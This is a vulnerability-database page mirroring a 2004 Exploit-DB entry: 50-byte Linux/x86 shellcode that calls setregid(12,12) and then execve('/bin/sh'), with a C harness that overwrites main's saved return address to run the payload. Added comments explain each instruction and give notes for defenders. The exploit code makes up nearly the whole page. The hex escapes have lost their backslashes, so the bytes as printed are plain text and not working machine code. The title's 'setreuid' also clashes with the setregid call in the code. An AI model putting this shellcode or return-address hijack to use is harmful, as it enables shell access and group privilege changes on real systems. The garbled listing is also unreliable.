Linux/x86 – execve(/bin/sh) + setreuid(12,12) Shellcode (50 bytes)

Linux/x86 – execve(/bin/sh) + setreuid(12,12) Shellcode (50 bytes)

漏洞ID 1054608 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13447
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  Linux/x86
 *  An example of setregid(), execve() /bin/sh
 *
 *  (I used this in practice, hence the setregid(12, 12);)
 */

#include <stdio.h>

/*
 * c0de: i386 Linux payload stored as a C string, annotated instruction by
 * instruction. Per the disassembly comments it issues two system calls
 * through int $0x80:
 *   1. syscall 71 with %ebx = %ecx = 12. On i386, 71 is setregid, which
 *      agrees with the author's comments; the page title says setreuid,
 *      which would be syscall 70.
 *   2. syscall 0x0b (execve) on the "/bin/sh" bytes at the tail.
 * The annotated instructions plus the 7-byte path add up to 50 bytes,
 * matching the size given in the title.
 *
 * NOTE(review): the string literals below contain no backslashes, so as
 * printed they are plain ASCII text ("x29xc0" is six characters), not
 * machine code. The hex escapes appear to have been stripped when the page
 * was extracted -- confirm against the original listing.
 *
 * Review notes for defenders:
 *   - The code locates its data with a jmp/call/pop sequence (jmp callz,
 *     call start, popl %esi), so it does not depend on its load address.
 *   - It writes into the bytes that follow it (a NUL after the path, then
 *     an argv array). It therefore needs memory that is both writable and
 *     executable; a W^X / non-executable-data policy blocks it.
 *   - The setregid request is subject to the normal kernel permission
 *     check; presumably the author's target already held GID 12 as a
 *     saved or effective group -- the page does not say.
 *   - The trailing "/bin/sh" bytes and the two int $0x80 instructions are
 *     in the clear (no encoding), which makes this pattern straightforward
 *     to match with content signatures.
 */
char c0de[] = 
/* main: */                            /* setregid(12, 12);        */
"x29xc0"                             /* subl %eax, %eax          */ /* eax = 0 without embedding a zero byte */
"xb0x47"                             /* movb $71, %al            */ /* syscall number 71 */
"x29xdb"                             /* subl %ebx, %ebx          */ /* ebx = 0 */

/*
 *  Here's the GID for the setregid() call. Change to suit.
 */
"xb3x0c"                             /* movb $12, %bl            */ /* first argument = 12 */
"x89xd9"                             /* movl %ebx, %ecx          */ /* second argument = same value */

"xcdx80"                             /* int $0x80                */ /* system call; result is not checked */
"xebx18"                             /* jmp callz                */ /* skip the 24 bytes of the start block */

/* start: */ /* execve of /bin/sh */
"x5e"                                 /* popl %esi                */ /* esi = address pushed by the call below, i.e. the path bytes */
"x29xc0"                             /* subl %eax, %eax          */ /* eax = 0 */
"x88x46x07"                         /* movb %al, 0x07(%esi)     */ /* NUL-terminate the 7-byte path */
"x89x46x0c"                         /* movl %eax, 0x0c(%esi)    */ /* argv[1] = NULL, also used as the empty envp */
"x89x76x08"                         /* movl %esi, 0x08(%esi)    */ /* argv[0] = pointer to the path */
"xb0x0b"                             /* movb $0x0b, %al          */ /* syscall number 11 (execve on i386) */
"x87xf3"                             /* xchgl %esi, %ebx         */ /* ebx = path */
"x8dx4bx08"                         /* leal 0x08(%ebx), %ecx    */ /* ecx = argv */
"x8dx53x0c"                         /* leal 0x0c(%ebx), %edx    */ /* edx = envp */
"xcdx80"                             /* int $0x80                */ /* system call; no exit path follows if it fails */

/* callz: */
"xe8xe3xffxffxff"                 /* call start               */ /* pushes the address of the next byte (the path) */

/* /bin/sh */
/*
 * The path is the last data in the array. The stores to 0x08(%esi) and
 * 0x0c(%esi) above land past the end of this array object, in whatever
 * memory happens to follow it.
 */
"x2fx62x69x6ex2fx73x68";

/*
 * Test harness: prints the length of c0de, then overwrites a stack slot so
 * that returning from main transfers control to c0de.
 *
 * Review notes:
 *   - Declared without a return type (implicit int, pre-C99 style) and
 *     falls off the end without a return statement.
 *   - strlen() is called but <string.h> is not included in the listing, and
 *     its size_t result is printed with %d.
 *   - The format string ends in "n"; presumably a newline escape whose
 *     backslash was lost in extraction -- confirm against the original.
 *   - The cast (int)c0de only holds a full pointer where int and pointers
 *     have the same width (the page targets 32-bit x86).
 *   - The pointer arithmetic on &ret is undefined behaviour: it relies on
 *     one particular compiler's frame layout. Stack protectors, a different
 *     frame layout, or non-executable data pages each stop it from working
 *     as the author intended.
 */
main() {
        int *ret;
        /* Point two ints above ret's own slot; presumably the saved return
         * address in the author's 32-bit frame layout -- not guaranteed. */
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(c0de));
        /* Replace that slot with the address of c0de, so the function's
         * return jumps into the array instead of back to the caller. */
        (*ret) = (int)c0de;
}

// milw0rm.com [2004-09-12]
